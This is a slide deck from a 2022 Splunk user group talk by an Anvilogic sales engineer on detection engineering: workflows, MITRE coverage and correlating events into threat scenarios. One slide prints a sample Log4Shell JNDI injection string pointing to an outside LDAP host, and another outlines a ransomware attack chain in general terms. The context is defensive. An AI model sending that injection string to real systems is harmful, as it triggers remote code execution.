SF Bay Area Splunk User Group Meeting October 5, 2022
1. ANVILOGIC Inc. C O N F I D E N T I A L
Modernizing Threat Detection Engineering
San Francisco Bay Area Splunk User Group
Virtual Meeting, October 5, 2022
2. ANVILOGIC Inc. C O N F I D E N T I A L 2
Andrew D’Auria - whoami?
● Director of Sales Engineering at Anvilogic
● Software industry since 1996
● CISSP since 2015
● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others
● Managing, coaching, and hiring Sales Engineers since 2018
● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007
● Married to Ilissa for 24 years, with 2 daughters Jessica (17)
and Julie (14)
● Will play anything with frets, but especially electric guitar
since 1988
● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint
3. ANVILOGIC Inc. C O N F I D E N T I A L
Data Science Insights & Models
Core Security Operations Functions
3
Cloud Only
Detection Eng. Mature/Maintain
Accelerated Detection Insights, Improve
Purple Team / Threat Research
Hunt
Become Proactive
Triage
Smarter, Faster Analysis
Respond
Automate Response
4. ANVILOGIC Inc. C O N F I D E N T I A L 4
Detection Engineering - The Current Way
1. Manual Research
(ex. Google, Github)
Identify Threat Research 48 hr
2. Track / Feedback
(ex. JIRA)
Create Ticket 1 hr
3. Develop, Test, Deploy
(ex. SIEM)
Build Test
4. Document Use Case
(ex. Confluence)
Runbook 3 hr
Deploy 20 hr
5. Metrics & Reporting
(ex. Qlikview)
Maintain/Tune KPIs
Disjoint
People,
Process,
Technology
Start
End
3-5
Days Each
2-3+
Teams
5+
Tools
x 3
Times
=
+15D
Log4Shell Attack (3 Use
Cases (exploit, .exe, C2)
5. ANVILOGIC Inc. C O N F I D E N T I A L 5
1
Detection engineering is
● slow
● difficult
● results in noisy false
positives delivered to
the SOC
2 3
Bringing all data into a
centralized SIEM data
store is
● expensive
● difficult
especially in hybrid
cloud environments
There is no good way to
● track MITRE ATT&CK
technique coverage
● measure maturity
progress in real time
● identify gaps and
measure risk
What are the problems with detection engineering today?
6. ANVILOGIC Inc. C O N F I D E N T I A L
How can we measure the effectiveness of our DE program?
6
Collection
Detection
Response
• Data Coverage
• Data Quality
• Data Availability
• Detection Coverage
• Detection Quality
• Lifecycle Management
• Alert Management
• Workflow
• Speed
• Accuracy
Strategic Maturity
How Are We Performing?
How Can We Perform Better?
Where Can We Perform Better?
Organizational Risk?
Industry-Specific Risk?
Technology-Specific Risk?
Communicating Value?
Operational Maturity
7. ANVILOGIC Inc. C O N F I D E N T I A L
Typical vs. Ideal Detection → Pyramid of Pain
Typical
• IOC Driven
• Very time limited
• Lack of Context
• Whack-a-mole
Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Ideal
• Tool & Behavior
Driven
• Very hard for
adversaries to change
• Long term strategic
value for detections
8. ANVILOGIC Inc. C O N F I D E N T I A L
Content 2.0
8
Events
Events of
Interest
Alerts
Traditional
Alerts
Threat Scenarios
Risk Thresholds
9. ANVILOGIC Inc. C O N F I D E N T I A L
Threat Identifiers and Threat Scenarios
9
Threat Scenario
Entity ‘X' Entity ‘X' Entity ‘X'
+ +
Threat Identifier
Event ID = “1234”
AND
(Process Name = “XYZ”
OR
Process Name = “ABC”)
Events of Interest
Event of Interest “A”
AND (60 Minutes)
Event of Interest “B”
AND (5 hours)
Event of Interest “C”
10. ANVILOGIC Inc. C O N F I D E N T I A L
Hunting Index - AKA: Events of Interest
● Correlating TTPs or Events of Interest
11. ANVILOGIC Inc. C O N F I D E N T I A L
Modern Security Operations
11
Hunt &
Correlate
Tag, Normalize,
Enrich
Case/Ticketing
& SOAR
Detection Engineering, Alerting, Triage, Hunting, and Response
Across Modern Hybrid Data Environments
Analyst Activity
Triage Threat
Scenarios
Auto-Threat
Detection
No Code -
Build Rules
Detection
Recommendations
Security & IT Products
(ex. EDR, AV, Cloud)
Logs
Logging Platforms
(ex. Splunk, Snowflake, Azure)
Query & Import
API
Query
API
Pull
API Store
Identifiers
(EOIs)
13. ANVILOGIC Inc. C O N F I D E N T I A L 13
Example: Log4Shell Attack Pattern
Attacker Victim Security Operations Center Response
{$jndi:ldap://1.2.3.4/Exploit}
1
2
java.exe <Payload Class>
3
Establish C2
Detection
Engineers
Research, Test,
Document, Deploy
Alert 3
1000s alerts Alert 1
Alert 2
SOC
Triage
3-5
Days
Build MITRE Attack Detections
1 2 3
+ +
Easy Correlation -
No Code Required!
Initial Access Execution C2
Workspace
& Tasks
Track
Tune,
Versions
Test,
Deploy
Improve,
Mature
Maintain
Research
Exploit in Lab
Develop, Test,
Share
Threat Research
Reduce Alert Volume,
Improve Dwell Time
Attack Scenario
1 2 3
+ +
Triage
Under
2
Hours
Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)
14. ANVILOGIC Inc. C O N F I D E N T I A L
1
4
Example: Ransomware Attack Pattern
Start
Windows Macro
Execution
An employee opens a
malicious attachment
that runs a macro
Stage 1: Initial Access
1
Cobalt Strike
Abnormal Web
Connection
Machine makes abnormal
web connection to malware
payload domain and
establishes persistence
+60m
3
Stage 3: Command & Control
Stage 2: Installation
Encoded PowerShell
Command
Macro spawns an
encoded command in
powershell
+30s
2
Word Doc
Last Chance
to Detect!
Stage 4: Discovery
AD Find
Execution
Attacker uses adfind to
gather active directory
information for internal
reconnaissance
+60m
Batch File
</>
4
4 Rules 1 Correlation How Long?
+ =
+
15. ANVILOGIC Inc. C O N F I D E N T I A L 15
Anvilogic Impacts - 50B Financial Services
+180
EDR RULES
111
CLOUD
97
ENDPOINT
31
WEB
+403
CUSTOM
55
Azure Rules
Improved by +31%
20
AWS Rules
Improved by +75%
12
GCP Rules
Improved by +17%
24
O365 Rules
Improved by +21%
12
Proxy Rules
Improved by +30%
19
Web App Rules
Improved by +40%
55
Windows Rules
Improved by +55%
42
Linux Rules
Improved by +90%
180
EDR Rules
Linux & Windows
51
SCENARIOS
239
IDENTIFIERS
17
MACROS
8.14M
Warnings
300+
Identifiers
351
Alerts
10+
Scenarios
8.1T
Raw Events
4,000+
Sourcetypes
USE CASES
454
DEPLOYED
5.8
Alerts per day
UPLOADS
DOWNLOADS
~2m
● Increased Overall Detections by 91%
● Saved up to 6,500+ hours of engineering time
Anvilogic Framework Impacts
(60 Days)
16. ANVILOGIC Inc. C O N F I D E N T I A L
Key Takeaways
& Next Steps
● Effective detection engineering requires good
data, process, and measurement
● Not every detection requires an alert or action
● Build effective detections based on real-world
attack scenarios and risk thresholds
● Pyramid of pain whitepaper
https://www.anvilogic.com/learn/whitepaper-
pyramid-apex
● Subscribe to our Threat Report
anvilogic.com/resources/threat-report